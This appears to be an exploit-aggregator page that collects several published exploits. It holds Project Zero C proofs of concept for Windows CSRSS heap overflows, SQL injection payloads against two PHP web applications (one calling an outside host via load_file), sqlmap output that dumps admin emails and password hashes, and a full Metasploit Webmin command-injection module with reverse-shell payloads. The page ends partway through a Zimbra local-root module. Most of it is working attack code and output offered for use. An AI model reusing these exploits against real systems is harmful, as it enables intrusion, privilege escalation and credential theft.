Latest exploits :: CodePwn

<pre><code>Windows: heap buffer overflow in sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString ## SUMMARY A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges. ## VULNERABILITY DETAILS ``` __int64 __fastcall BaseSrvActivationContextCacheDuplicateUnicodeString(UNICODE_STRING *Dst, UNICODE_STRING *Src) { unsigned int Length; // ebx SIZE_T NewMaxLength; // r8 WCHAR *Heap; // rax __int64 Status; // rax Length = Src->Length; if ( (_WORD)Length ) { NewMaxLength = (unsigned __int16)(Length + 2); // *** 1 *** Dst->MaximumLength = NewMaxLength; Heap = (WCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, NewMaxLength); // *** 2 *** Dst->Buffer = Heap; if ( Heap ) { memcpy_0(Heap, Src->Buffer, Length); // *** 3 *** Dst->Buffer[(unsigned __int64)Length >> 1] = 0; Status = 0i64; Dst->Length = Length; } else { return 0xC0000017i64; } } else { *(_DWORD *)&Dst->Length = 0; Status = 0i64; Dst->Buffer = 0i64; } return Status; } ``` The function above attempts to reserve two extra bytes for a trailing null character. The new size gets truncated to a 16-bit value[1], so if the size of the source string is 0xfffe bytes, the function will try to allocate a 0-byte buffer[2] and copy 0xfffe bytes into it[3]. The vulnerable function is reachable from the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine. However, the default size of the CSR shared memory section is only 0x10000 bytes, and some of that space must be reserved for the capture buffer header, so by default it's impossible to pass a big enough `UNICODE_STRING` to CSRSS. Luckily, the size of the section is controlled entirely by the client process, and if an attacker can modify `ntdll!CsrpConnectToServer` early enough during process startup, they'll be able to pass strings of (virtually) any size. ## VERSION Windows 11 12H2 (OS Build 22000.593) Windows 10 12H2 (OS Build 19044.1586) ## REPRODUCTION CASE This (not very reliable) proof-of-concept creates a new process in a suspended state, attempts to find and replace 32-bit value 0x10000 inside `CsrpConnectToServer`, and resumes the process' main thread. Then the child process sends a CSR request with a huge string. 1) Enable page heap verification for csrss.exe: ``` gflags /p /enable csrss.exe /full ``` 2) Restart the machine. 3) Compile and run: ``` #include <windows.h> #include <winternl.h> #include <string> PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG); VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID); NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG); NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR); void CaptureString(LPVOID capture_buffer, uint8_t* msg_field, PCWSTR string, size_t length = 0, size_t max_length = 0) { if (length == 0) length = lstrlenW(string); CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2, length * 2 + 2, (PSTR)msg_field); } int main(int argc, char* argv[]) { HMODULE ntdll = LoadLibrary(L\"ntdll\"); if (argc == 1) { STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; si.cb = sizeof(si); WCHAR image_path[MAX_PATH + 1]; GetModuleFileName(NULL, image_path, MAX_PATH); std::wstring args = image_path; args += L\" child\"; CreateProcess(&image_path[0], &args[0], NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi); PVOID csrClientConnectToServer = GetProcAddress(ntdll, \"CsrClientConnectToServer\"); size_t offset = 0; for (; offset < 0x1000; ++offset) if (*(uint32_t*)((char*)csrClientConnectToServer + offset) == 0x10000) break; uint32_t new_size = 0x20000; WriteProcessMemory(pi.hProcess, (char*)csrClientConnectToServer + offset, &new_size, sizeof(new_size), NULL); ResumeThread(pi.hThread); } else { #define INIT_PROC(name) \\ name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name)); INIT_PROC(CsrAllocateCaptureBuffer); INIT_PROC(CsrFreeCaptureBuffer); INIT_PROC(CsrClientCallServer); INIT_PROC(CsrCaptureMessageString); const size_t HEADER_SIZE = 0x40; uint8_t msg[HEADER_SIZE + 0x1f8] = {0}; #define FIELD(n) msg + HEADER_SIZE + 8 * n #define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value; SET_FIELD(0, 0x900000041); SET_FIELD(3, 0x10101); SET_FIELD(6, 0x88); SET_FIELD(7, -1); std::string manifest = \"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' \" \"manifestVersion='1.0'>\" \"<assemblyIdentity name='A' version='1.0.0.0'/>\" \"</assembly>\"; SET_FIELD(8, manifest.c_str()); SET_FIELD(9, manifest.size()); SET_FIELD(22, 1); PVOID capture_buffer = CsrAllocateCaptureBuffer(3, 0x10200); CaptureString(capture_buffer, FIELD(1), L\"\\x00\\x00\", 2); CaptureString(capture_buffer, FIELD(4), L\"C:\\\\Windows\\\ otepad.exe\"); CaptureString(capture_buffer, FIELD(17), L\"C:\\\\A\\\\\"); SET_FIELD(17, 0xfffefffe); CsrClientCallServer(msg, capture_buffer, 0x1001001e, sizeof(msg) - HEADER_SIZE); } } ``` 4) Wait for a crash: ``` CONTEXT: 000000bd41a3ddc0 -- (.cxr 0xbd41a3ddc0) rax=000002224855c000 rbx=000000000000fffe rcx=000002224855c010 rdx=fffffffff7ecde20 rsi=000000bd41a3ec48 rdi=000000000000fffe rip=00007ffbd59d3c53 rsp=000000bd41a3eb08 rbp=000000bd41a3efc8 r8=000000000000002e r9=00000000000003ff r10=000002224855c000 r11=0000022240439e1e r12=00000000000007a4 r13=0000000000000001 r14=000000bd41a3ee38 r15=000000bd41a3ee20 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 ntdll!memcpy+0x113: 0033:00007ffb`d59d3c53 0f2941f0 movaps xmmword ptr [rcx-10h],xmm0 ds:002b:00000222`4855c000=???????????????????????????????? Resetting default scope WRITE_ADDRESS: 000002224855c000 EXCEPTION_RECORD: 000000bd41a3e2b0 -- (.exr 0xbd41a3e2b0) ExceptionAddress: 00007ffbd59d3c53 (ntdll!memcpy+0x0000000000000113) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000001 Parameter[1]: 000002224855c000 Attempt to write to address 000002224855c000 STACK_TEXT: 000000bd`41a3eb08 00007ffb`d2f34f24 : 00000000`00000000 00000000`0000fffe 00000000`00000000 00000000`00000000 : ntdll!memcpy+0x113 000000bd`41a3eb10 00007ffb`d2f34e4b : 000000bd`41a3ee20 000000bd`41a3ec30 00000000`00000000 00000222`3a760000 : sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString+0x64 000000bd`41a3eb40 00007ffb`d2f34d43 : 00000000`00000000 000000bd`41a3ee20 00000222`47868e20 00007ffb`d2d7b8b4 : sxssrv!BaseSrvActivationContextCacheDuplicateKey+0x4b 000000bd`41a3eb70 00007ffb`d2f34916 : 000000bd`41a3ed78 000000bd`41a3ee20 000000bd`41a3efd4 000000bd`41a3efe0 : sxssrv!BaseSrvActivationContextCacheCreateEntry+0x83 000000bd`41a3ebd0 00007ffb`d2f34018 : 00000000`00000000 00000000`00000000 00000000`00000000 000000bd`41a3f410 : sxssrv!BaseSrvActivationContextCacheInsertEntry+0x86 000000bd`41a3ed20 00007ffb`d2f31dce : 00000000`000007f4 00000000`000000f0 00000000`00010244 00000000`00000000 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x818 000000bd`41a3f160 00007ffb`d2fb6490 : 00000222`3d0d0750 00000000`000000f0 00000222`4785ef30 00000222`3a877f80 : sxssrv!BaseSrvSxsCreateActivationContextFromMessage+0x32e 000000bd`41a3f2d0 00007ffb`d598265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0 000000bd`41a3f970 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f ``` ## CREDIT INFORMATION Sergei Glazunov of Google Project Zero **This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-07-19.** Related CVE Numbers: CVE-2022-22049,CVE-2022-22049. Found by: glazunov@google.com </code></pre>

<pre><code>Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity ## SUMMARY A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges. ## VULNERABILITY DETAILS In 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of the `UNICODE_STRING` parameters of the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine wasn't properly validated, and was later used by `XMLParser_Element_doc_assembly_assemblyIdentity` as the maximum size of a `memcpy` destination buffer. The fix added an extra `CsrValidateMessageBuffer` call to `BaseSrvSxsCreateActivationContextFromMessage`. We've just discovered that `BaseSrvSxsCreateActivationContextFromMessage` is not the only CSR routine that can reach `XMLParser_Element_doc_assembly_assemblyIdentity`. An attacker can trigger the same buffer overflow via `BaseSrvSxsCreateProcess`. 1. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-1027.html ## VERSION Windows 11 12H2 (OS Build 22000.593) Windows 10 12H2 (OS Build 19044.1586) ## REPRODUCTION CASE 1) Enable page heap verification for csrss.exe: ``` gflags /p /enable csrss.exe /full ``` 2) Restart the machine. 3) Compile and run: ``` #pragma comment(lib, "ntdll") #include <windows.h> #include <winternl.h> #include <cstdint> #include <cstdio> #include <string> typedef struct _SECTION_IMAGE_INFORMATION { PVOID EntryPoint; ULONG StackZeroBits; ULONG StackReserved; ULONG StackCommit; ULONG ImageSubsystem; WORD SubSystemVersionLow; WORD SubSystemVersionHigh; ULONG Unknown1; ULONG ImageCharacteristics; ULONG ImageMachineType; ULONG Unknown2[3]; } SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; typedef struct _RTL_USER_PROCESS_INFORMATION { ULONG Size; HANDLE ProcessHandle; HANDLE ThreadHandle; CLIENT_ID ClientId; SECTION_IMAGE_INFORMATION ImageInformation; BYTE Unknown1[128]; } RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; NTSTATUS(NTAPI* RtlCreateProcessParameters) (PRTL_USER_PROCESS_PARAMETERS*, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PVOID, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING); NTSTATUS(NTAPI* RtlCreateUserProcess) (PUNICODE_STRING, ULONG, PRTL_USER_PROCESS_PARAMETERS, PSECURITY_DESCRIPTOR, PSECURITY_DESCRIPTOR, HANDLE, BOOLEAN, HANDLE, HANDLE, PRTL_USER_PROCESS_INFORMATION); PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG); VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID); NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG); NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR); void CaptureString(LPVOID capture_buffer, uint8_t* msg_field, PCWSTR string, size_t length = 0) { if (length == 0) length = lstrlenW(string); CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2, length * 2 + 2, (PSTR)msg_field); } int main() { HMODULE ntdll = LoadLibrary(L"ntdll"); #define INIT_PROC(name) \ name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name)); INIT_PROC(RtlCreateProcessParameters); INIT_PROC(RtlCreateUserProcess); INIT_PROC(CsrAllocateCaptureBuffer); INIT_PROC(CsrFreeCaptureBuffer); INIT_PROC(CsrClientCallServer); INIT_PROC(CsrCaptureMessageString); UNICODE_STRING image_path; PRTL_USER_PROCESS_PARAMETERS proc_params; RTL_USER_PROCESS_INFORMATION proc_info = {0}; RtlInitUnicodeString(&image_path, L"\\SystemRoot\\notepad.exe"); RtlCreateProcessParameters(&proc_params, &image_path, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); RtlCreateUserProcess(&image_path, OBJ_CASE_INSENSITIVE, proc_params, NULL, NULL, NULL, FALSE, NULL, NULL, &proc_info); const size_t HEADER_SIZE = 0x40; uint8_t msg[HEADER_SIZE + 0x1f8] = {0}; #define FIELD(n) msg + HEADER_SIZE + 8 * n #define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value; SET_FIELD(2, proc_info.ClientId.UniqueProcess); SET_FIELD(3, proc_info.ClientId.UniqueThread); SET_FIELD(4, -1); SET_FIELD(7, 1); SET_FIELD(8, 0x20000); std::string manifest = "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' " "manifestVersion='1.0'>" "<assemblyIdentity name='@' version='1.0.0.0'/>" "</assembly>"; manifest.replace(manifest.find('@'), 1, 0x4000, 'A'); SET_FIELD(13, manifest.c_str()); SET_FIELD(14, manifest.size()); PVOID capture_buffer = CsrAllocateCaptureBuffer(6, 0x200); CaptureString(capture_buffer, FIELD(22), L"C:\\Windows\\"); CaptureString(capture_buffer, FIELD(24), L"\x00\x00", 2); CaptureString(capture_buffer, FIELD(28), L"A"); SET_FIELD(28, 0xff000002); CsrClientCallServer(msg, capture_buffer, 0x1001001d, sizeof(msg) - HEADER_SIZE); } ``` The crash should look like to the following: ``` CONTEXT: 0000007c4afbcfc0 -- (.cxr 0x7c4afbcfc0) rax=0000020e6515ce00 rbx=0000000000004000 rcx=0000020e6515d010 rdx=fffffffffbe741fa rsi=0000020e652c48c0 rdi=0000000000000001 rip=00007ff825a53c53 rsp=0000007c4afbdd38 rbp=0000007c4afbde80 r8=0000000000000032 r9=00000000000001f7 r10=00007ff822e6b558 r11=0000020e60fd8ffc r12=0000020e66d1cf80 r13=0000000000000001 r14=0000000000000000 r15=0000000000000005 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 ntdll!memcpy+0x113: 0033:00007ff8`25a53c53 0f2941f0 movaps xmmword ptr [rcx-10h],xmm0 ds:002b:0000020e`6515d000=???????????????????????????????? Resetting default scope WRITE_ADDRESS: 0000020e6515d000 EXCEPTION_RECORD: 0000007c4afbd4b0 -- (.exr 0x7c4afbd4b0) ExceptionAddress: 00007ff825a53c53 (ntdll!memcpy+0x0000000000000113) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000001 Parameter[1]: 0000020e6515d000 Attempt to write to address 0000020e6515d000 STACK_TEXT: 0000007c`4afbdd38 00007ff8`22df5a41 : 0000020e`652c48c0 00000000`00000001 00000000`00000001 00000000`00000001 : ntdll!memcpy+0x113 0000007c`4afbdd40 00007ff8`22e07b94 : 00007ff8`00000000 00000000`000000a8 0000020e`652c48c0 0000020e`652c48c0 : sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity+0x4c1 0000007c`4afbe3c0 00007ff8`22e1f406 : 0000020e`652e7f20 0000020e`652e7f20 00000000`00000000 00000000`00000000 : sxs!CNodeFactory::CreateNode+0xd34 0000007c`4afbe7d0 00007ff8`22df8a33 : 0000020e`00000000 0000020e`652a8cc8 00000000`00000000 0000020e`65166e20 : sxs!XMLParser::Run+0x8d6 0000007c`4afbe8f0 00007ff8`22df7468 : 0000020e`00000000 0000020e`6527ac90 00000000`00000000 0000020e`6527ac90 : sxs!SxspIncorporateAssembly+0x513 0000007c`4afbeab0 00007ff8`22df7cf6 : 00000000`00000000 00000000`00000000 0000020e`6527ac90 0000020e`65167720 : sxs!SxspIncorporateAssembly+0x104 0000007c`4afbeb60 00007ff8`22df3769 : 0000007c`00000000 0000007c`4afbefa0 00000000`00000000 0000020e`65166e20 : sxs!SxspCloseManifestGraph+0xbe 0000007c`4afbec00 00007ff8`22fb3eed : 00000000`00000000 00000000`00000000 00000000`00000000 0000007c`4afbf3a0 : sxs!SxsGenerateActivationContext+0x339 0000007c`4afbed60 00007ff8`22fb2405 : 0000007c`4afbf1f0 000004f7`0000000b 00000000`00000000 00000000`00000001 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x6ed 0000007c`4afbf1a0 00007ff8`22fb1e91 : 0000020e`56e00000 00000000`01080002 00000000`00000264 00000000`00000270 : sxssrv!InternalSxsCreateProcess+0x545 0000007c`4afbf680 00007ff8`230133c3 : 00000000`00000000 0000007c`4afbf789 00000000`00000000 00000000`00000000 : sxssrv!BaseSrvSxsCreateProcess+0x71 0000007c`4afbf6c0 00007ff8`23036490 : 0000020e`ffffffff 0000007c`4afbf848 0000020e`00000000 0000020e`00000001 : basesrv!BaseSrvCreateProcess2+0x1f3 0000007c`4afbf7f0 00007ff8`25a0265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0 0000007c`4afbfe90 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f ``` ## CREDIT INFORMATION Sergei Glazunov of Google Project Zero Related CVE Numbers: CVE-2020-1027,CVE-2022-22026,CVE-2022-22026. Found by: glazunov@google.com </code></pre>

<pre><code>## Title: Gas Agency Management-2022 by Mayuri K - SQLi+FU-RCE+XSS ## Author: nu11secur1ty ## Date: 08.12.2022 ## Vendor Homepage: https://www.mayurik.com/#download_section ## Software Link-0: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html ## Software Link-1: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022/Docs/gasmark.zip ## Description: The Gas Agency Management-2022 by Mayuri K suffers from multiple vulnerabilities, which means this project must be deprecated immediately! 1. - SQLi: the parameter username is vulnerable to time-based blind (query SLEEP) injection - not sanitizing well. 2. - Unauthenticated file upload - not sanitizing upload function - possible to upload .php extension files on photo section, for the customers. 3. - XSS-reflected in the section adds customer in address function. 4. - Web shell file upload - unauthenticated extension file upload, in this case, is PHP web shell uploader. After this, the malicious user can execute the already uploaded file remotely, and he can destroy completely this flawed system. 5. - STATUS: For termination of the project. [+]Payloads: ```mysql --- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=mxiusQzi'+(select load_file('\\\\alzg6yrkl2xieezgaz9zqnya91fu3lw9ncb4yumj.tupaciganka.com\\jfe'))+'' AND (SELECT 9964 FROM (SELECT(SLEEP(5)))bVfa)-- FygL&password=r8H!r2a!U2&login= --- ``` [+]Unauthenticated Upload: - - - in the video:https://streamable.com/opqz3n [+]XSS-Reflected: - - - in the video:https://streamable.com/opqz3n [+]RCE: - - - in the video:https://streamable.com/opqz3n ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022) ## Proof and Exploit: [href](https://streamable.com/opqz3n) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : i-netsolution.com │ │ │ │ Vendor : i-Net Solution │ │ │ │ Software : Readymade Job Portal Script │ │ Job Portal is a website that serves │ │ Vuln Type: Remote SQL Injection │ │ as a bridge between employers │ │ Method : GET │ │ and job seekers │ │ Impact : Database Access │ │ │ │ │ │ │ │────────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7 CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'salary_to' is vulnerable. --- Parameter: salary_to (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437 --- [+] Starting the Attack [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0 (MariaDB fork) [INFO] fetching current database current database: 'theminsall_jobportal_db' [INFO] fetching tables for database: 'theminsall_jobportal_db' Database: theminsall_jobportal_db [72 tables] +----------------------------------+ | admin_password_resets | | admins | | applicant_messages | | blog_categories | | blogs | | career_levels | | cities | | cms | | cms_content | | companies | | company_messages | | company_password_resets | | contact_messages | | countries | | countries_details | | degree_levels | | degree_types | | failed_jobs | | faqs | | favourite_applicants | | favourites_company | | favourites_job | | functional_areas | | genders | | industries | | job_alerts | | job_apply | | job_apply_rejected | | job_experiences | | job_shifts | | job_skills | | job_titles | | job_types | | jobs | | language_levels | | languages | | major_subjects | | manage_job_skills | | marital_statuses | | migrations | | ownership_types | | packages | | password_resets | | payu_transactions | | profile_cvs | | profile_education_major_subjects | | profile_educations | | profile_experiences | | profile_languages | | profile_projects | | profile_skills | | profile_summaries | | queue_jobs | | report_abuse_company_messages | | report_abuse_messages | | result_types | | roles | | salary_periods | | send_to_friend_messages | | seo | | site_settings | | sliders | | states | | subscriptions | | testimonials | | unlocked_users | | user_messages | | users | | videos | | widget_pages | | widgets | | widgets_data | +----------------------------------+ [INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db' Database: theminsall_jobportal_db Table: admins [8 columns] +----------------+------------------+ | Column | Type | +----------------+------------------+ | created_at | timestamp | | email | varchar(191) | | id | int(10) unsigned | | name | varchar(191) | | password | varchar(191) | | remember_token | varchar(100) | | role_id | int(11) | | updated_at | timestamp | +----------------+------------------+ [INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db' Database: theminsall_jobportal_db Table: admins [3 entries] +----+--------------------+--------------------------------------------------------------+-----------+ | id | email | password | name | +----+--------------------+--------------------------------------------------------------+-----------+ | 3 | buyer@buyer.com | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer | | 4 | sub@jobsportal.com | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin | | 5 | admin@gmail.com | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin | +----+--------------------+--------------------------------------------------------------+-----------+ Possible Algorithms: bcrypt $2*$, Blowfish (Unix) [-] Done </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Webmin Package Updates RCE', 'Description' => %q{ This module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possibe to inject arbitrary command that will be concatenated to the package manager call. This exploit requires authentication and the account must have access to the Software Package Updates module. }, 'License' => MSF_LICENSE, 'Author' => [ 'Christophe De La Fuente', # MSF module 'Emir Polat' # Discovery and PoC ], 'References' => [ [ 'EDB', '50998' ], [ 'URL', 'https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165'], [ 'CVE', '2022-36446'] ], 'DisclosureDate' => '2022-07-26', 'Platform' => ['unix', 'linux'], 'Privileged' => true, 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64], 'Payload' => { 'BadChars' => '/' }, 'DefaultOptions' => { 'RPORT' => 10000, 'SSL' => true }, 'Targets' => [ [ 'Unix In-Memory', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' } } ], [ 'Linux Dropper (x86 & x64)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], [ 'Linux Dropper (ARM64)', { 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, 'Type' => :linux_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path to Webmin', '/']), OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', '123456']) ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res if res.body.include?('This web server is running in SSL mode.') return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed") end version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version version = Rex::Version.new(version) vprint_status("Webmin #{version} detected") unless version < Rex::Version.new('1.997') return CheckCode::Safe("#{peer} - Webmin #{version} is not a supported target") end vprint_good("Webmin #{version} is a supported target") CheckCode::Appears rescue ::Rex::ConnectionError return CheckCode::Unknown("#{peer} - Could not connect to web service") end def do_login res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/session_login.cgi'), 'headers' => { 'Referer' => full_uri }, 'cookie' => 'testing=1', 'keep_cookies' => true, 'vars_post' => { 'user' => datastore['USERNAME'], 'pass' => datastore['PASSWORD'] } }) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302 print_good('Logged in!') end def execute_command(cmd, _opts = {}) cmd = cmd.gsub('/', '${SEP}').gsub('\'', '"') cmd = "#{rand_text_alphanumeric(4)};SEP=$(perl -MMIME::Base64 -e \"print decode_base64('Lw==')\")&&#{cmd}" send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/package-updates/update.cgi'), 'headers' => { 'Referer' => full_uri }, 'vars_post' => { 'mode' => 'new', 'search' => rand_text(10), 'redir' => '', 'redirdesc' => '', 'u' => cmd, 'confirm' => 'Install Now' } }) end def exploit print_status('Attempting login') do_login print_status('Sending payload') case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Compile include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Zimbra zmslapd arbitrary module load', 'Description' => %q{ This module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root. }, 'License' => MSF_LICENSE, 'Author' => [ 'Darren Martyn', # discovery and poc 'Ron Bowes', # Module ], 'DisclosureDate' => '2021-10-27', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Privileged' => true, 'References' => [ [ 'CVE', '2022-37393' ], [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ], ], 'Targets' => [ [ 'Auto', {} ], ], 